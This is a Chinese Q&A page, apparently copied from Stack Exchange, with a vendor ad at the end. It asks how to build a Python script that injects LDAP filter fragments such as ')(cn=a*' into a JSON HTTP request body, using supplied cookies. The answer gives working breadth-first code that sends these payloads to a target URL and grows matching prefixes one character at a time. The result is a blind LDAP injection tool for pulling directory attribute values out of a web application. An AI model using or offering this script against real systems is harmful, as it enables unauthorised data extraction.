You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

如何生成字符全排列并循环匹配HTTP响应,实现增量式全字符遍历?

基于HTTP响应的字符增量遍历生成请求体

需求描述

需要遍历alphabet变量中的所有字符生成排列,当HTTP响应包含resout变量指定的字符串时,将匹配的字符追加到目标字符串中,继续进行增量式的字符遍历;当该分支无匹配后,回到之前的遍历位置继续后续字符,直到遍历完所有属性与字符,输出所有匹配的请求体。

现有代码

def nth_repl(s, sub, repl, n):
    find = s.find(sub)
    # 如果找到至少一个子串匹配,find不为-1
    i = find != -1
    # 循环直到找到第n个匹配或无匹配
    while find != -1 and i != n:
        # 从上次匹配的下一个位置开始搜索
        find = s.find(sub, find + 1)
        i += 1
    # 如果找到第n个匹配则替换
    if i == n:
        return s[:find] + repl + s[find+len(sub):]
    return s

[....]
resout = input("#要搜索的字符串:" )
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"%=^[]:;"
attributes = ["c", "cn", "co" ]
rawcoo = input("Cookie内容:")

inp = input("HTTP请求体:") #{"name" : "pippo$","age" : "36$","rights" : [ "pippo", "editor$", "contributor" ]}
cookie = SimpleCookie()
cookie.load(rawcoo)
cookies = {}
for key, morsel in cookie.items():
    cookies[key] = morsel.value    

for n in range(1, inp.count('$')+1):
    for attribute in attributes:
        initdata = nth_repl(inp, "$", f')({attribute}=*',n)
        data = initdata.replace("$", "")
        print(data)
        value = ""

        r = requests.post(url, data=data, cookies=cookies)
        if resout in r.text:

            
            for char in alphabet:               
                query = nth_repl(inp, "$", f")({attribute}={value}{char}*",n)
                boo = query.replace("$", "")
                #print(boo)


                r2 = requests.post(url, data=boo, cookies=cookies)
            
                if resout in r2.text:
                    print("匹配结果: " + boo ) 

当前实际输出

{"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(c=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[...]
{"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
{"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
[..] 以此类推

期望实现效果

  • 初始遍历单个字符的请求体,示例:
    {"name" : "pippo)(c=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    {"name" : "pippo)(c=z*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    [...]
    {"name" : "pippo)(cn=a*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    {"name" : "pippo)(cn=b*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    {"name" : "pippo)(cn=c*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    
  • 当匹配到某个请求(如)(cn=c*)时,在该基础上追加字符生成新请求,示例:
    {"name" : "pippo)(cn=ca*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    {"name" : "pippo)(cn=cb*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    [...]
    {"name" : "pippo)(cn=c2*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    [...]
    
  • 当该分支无更多匹配时,回到之前的遍历位置继续下一个字符(如)(cn=d*),示例:
    {"name" : "pippo)(cn=d*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    {"name" : "pippo)(cn=e*","age" : "36","rights" : [ "pippo", "editor", "contributor" ]}
    [..]
    
  • 若再次匹配(如)(cn=z*、)(cn=Z0mb*),重复增量追加逻辑,直到遍历完所有属性与字符,输出所有匹配的请求体。

修改后的代码实现

通过队列实现广度优先的增量遍历,完成需求逻辑:

def nth_repl(s, sub, repl, n):
    find = s.find(sub)
    # 如果找到至少一个子串匹配,find不为-1
    i = find != -1
    # 循环直到找到第n个匹配或无匹配
    while find != -1 and i != n:
        # 从上次匹配的下一个位置开始搜索
        find = s.find(sub, find + 1)
        i += 1
    # 如果找到第n个匹配则替换
    if i == n:
        return s[:find] + repl + s[find+len(sub):]
    return s

[....]
resout = input("#要搜索的字符串:" )
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"%=^[]:;"
attributes = ["c", "cn", "co" ]
rawcoo = input("Cookie内容:")

inp = input("HTTP请求体:") #{"name" : "pippo$","age" : "36$","rights" : [ "pippo", "editor$", "contributor" ]}
cookie = SimpleCookie()
cookie.load(rawcoo)
cookies = {}
for key, morsel in cookie.items():
    cookies[key] = morsel.value    

# 遍历每个$占位符的位置
for n in range(1, inp.count('$')+1):
    for attribute in attributes:
        # 初始化待测试的前缀队列,初始为空字符串(对应attribute=*的初始请求)
        prefix_queue = [""]
        has_matches = True
        
        while has_matches:
            has_matches = False
            new_prefixes = []
            
            for current_prefix in prefix_queue:
                # 生成对应前缀的测试请求体
                if current_prefix == "":
                    query = nth_repl(inp, "$", f')({attribute}=*', n)
                else:
                    query = nth_repl(inp, "$", f')({attribute}={current_prefix}*', n)
                
                query_clean = query.replace("$", "")
                r = requests.post(url, data=query_clean, cookies=cookies)
                
                if resout in r.text:
                    print("匹配结果: " + query_clean)
                    has_matches = True
                    
                    # 基于当前前缀追加所有字符,生成新的待测试前缀
                    for char in alphabet:
                        new_prefixes.append(current_prefix + char)
            
            # 更新队列,下一轮测试新生成的前缀
            prefix_queue = new_prefixes

代码说明

  • 用队列管理当前需要扩展的字符前缀,初始为空字符串,对应attribute=*的初始请求。
  • 每轮遍历队列中的所有前缀,生成请求体发送请求:若响应匹配目标字符串,则输出该请求体,并基于当前前缀追加每个字符生成新前缀,加入下一轮测试队列。
  • 若本轮无任何匹配,循环终止,回到属性或占位符的遍历逻辑,实现“匹配则增量扩展,无匹配则回溯”的需求。

内容的提问来源于stack exchange,提问作者jagghy

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.08.15 20:55:29